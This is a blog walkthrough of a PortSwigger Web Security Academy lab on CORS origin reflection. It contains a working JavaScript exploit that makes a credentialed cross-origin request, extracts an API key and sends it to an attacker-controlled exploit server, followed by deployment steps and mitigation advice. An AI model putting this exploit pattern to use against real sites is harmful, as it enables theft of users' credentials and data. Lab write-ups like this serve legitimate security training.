Solving Portswigger Labs: CORS vulnerability with basic origin reflection
Ryangombe
Introduction
Cross-Origin Resource Sharing (CORS) vulnerabilities represent a significant security risk when misconfigured. In this walkthrough, we'll explore PortSwigger's "CORS vulnerability with basic origin reflection" lab, demonstrating how improper CORS implementation can lead to sensitive data exposure.
Understanding CORS and the Vulnerability
What is CORS?
CORS is a browser security mechanism that allows web pages to make requests to different domains than the one serving the page. It uses HTTP headers to tell browsers whether specific cross-origin requests should be allowed.
The Vulnerability
The target application has a critical CORS misconfiguration: it trusts all origins by reflecting any origin header back in the Access-Control-Allow-Origin response header, combined with Access-Control-Allow-Credentials: true. This combination allows any malicious website to make authenticated requests and read sensitive responses.
Lab Setup and Initial Analysis
Lab Objective: Craft JavaScript that uses CORS to retrieve the administrator's API key and upload it to your exploit server.
Credentials: wiener:peter
Step 1: Confirming the Vulnerability
After logging in with the provided credentials, I tested the CORS configuration by intercepting the request to /accountDetails and adding a custom Origin header:
GET /accountDetails HTTP/2
Host: 0a16002b041df12c80c2039b00a40038.web-security-academy.net
Cookie: session=lRQLThI1i6vbkb10XGh7cGtKW1N1eFPO
Origin: https://attacker.com
The server's response confirmed the vulnerability:
HTTP/2 200 OK
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
{
"username": "wiener",
"email": "",
"apikey": "AQqU5vW28FVytBfqUwmm6ip5EfOcGLbX",
"sessions": [
"lRQLThI1i6vbkb10XGh7cGtKW1N1eFPO"
]
}
Key Observations:
The
Originheader is reflected exactly inAccess-Control-Allow-OriginAccess-Control-Allow-Credentials: trueallows cookies to be includedThe response contains sensitive data including the API key
Crafting the Exploit
Step 2: JavaScript Exploit Development
The exploit leverages the CORS misconfiguration to steal the administrator's API key:
// CORS exploit to retrieve administrator's API key
var req = new XMLHttpRequest();
req.onload = function() {
// Parse the response to extract the API key
var response = JSON.parse(this.responseText);
var apikey = response.apikey;
// Send the API key to your exploit server
var exfiltrate = new XMLHttpRequest();
exfiltrate.open("GET", "https://exploit-0aeb008b0447f11580ef02f501ce00b3.exploit-server.net/exploit?apikey=" + apikey, true);
exfiltrate.send();
};
// Make CORS request to the vulnerable endpoint
req.open("GET", "https://0a16002b041df12c80c2039b00a40038.web-security-academy.net/accountDetails", true);
req.withCredentials = true; // Important: include cookies in the request
req.send();
Exploit Breakdown:
XMLHttpRequest Creation: Creates a new request object
Credential Inclusion:
withCredentials: trueensures session cookies are sentResponse Handling: Parses JSON response and extracts the API key
Data Exfiltration: Sends the stolen API key to the attacker-controlled server
Step 3: Deploying the Exploit
Navigate to the exploit server:
https://exploit-0aeb008b0447f11580ef02f501ce00b3.exploit-server.net/Paste the JavaScript code into the body section (wrapped in
<script>tags)Click "Store" to save the exploit payload
Click "Deliver exploit to victim" to trigger the attack
Click "Access server log"
Check the request that was made by the victim to the exploit server that looks like this:
10.0.4.241 2025-07-23 08:49:53 +0000 "GET /exploit?apikey=i3NCPLRccl0ZXOKFX5Sb3ErmkkZkf6VR HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"Submit solution
Why This Attack Works
Technical Analysis
The attack succeeds due to three critical factors:
Origin Reflection: The server reflects any origin without validation
Credential Support:
Access-Control-Allow-Credentials: trueallows authenticated requestsSensitive Data Exposure: The endpoint returns sensitive information in the response
When the administrator visits the malicious page:
Their browser executes the malicious JavaScript
The script makes a CORS request to
/accountDetailswith the admin's session cookiesThe server processes the request as if it came from the admin
The response containing the API key is readable by the malicious script
The API key is exfiltrated to the attacker's server
Prevention and Mitigation
Secure CORS Configuration
To prevent this vulnerability:
Whitelist Specific Origins: Only allow trusted domains
Access-Control-Allow-Origin: https://trusted-domain.comAvoid Wildcards with Credentials: Never combine
*withAccess-Control-Allow-Credentials: trueValidate Origins Properly: Implement server-side origin validation
const allowedOrigins = ['https://app.company.com', 'https://admin.company.com']; if (allowedOrigins.includes(request.headers.origin)) { response.setHeader('Access-Control-Allow-Origin', request.headers.origin); }Minimize Credential Exposure: Only set
Access-Control-Allow-Credentials: truewhen absolutely necessary
Conclusion
This lab demonstrates how a simple CORS misconfiguration can lead to complete compromise of user data. The combination of origin reflection and credential support creates a perfect storm for cross-origin attacks. Security practitioners should regularly audit CORS configurations and implement strict origin validation to prevent such vulnerabilities.
Key Takeaways:
CORS misconfigurations can be as dangerous as traditional XSS vulnerabilities
Proper origin validation is critical for secure CORS implementation
Never trust user-supplied origin headers without validation
Regular security testing should include CORS configuration reviews
Understanding and preventing CORS vulnerabilities is essential for modern web application security, as APIs and cross-origin communications become increasingly prevalent in web development.
Subscribe to my newsletter
Read articles from Ryangombe directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by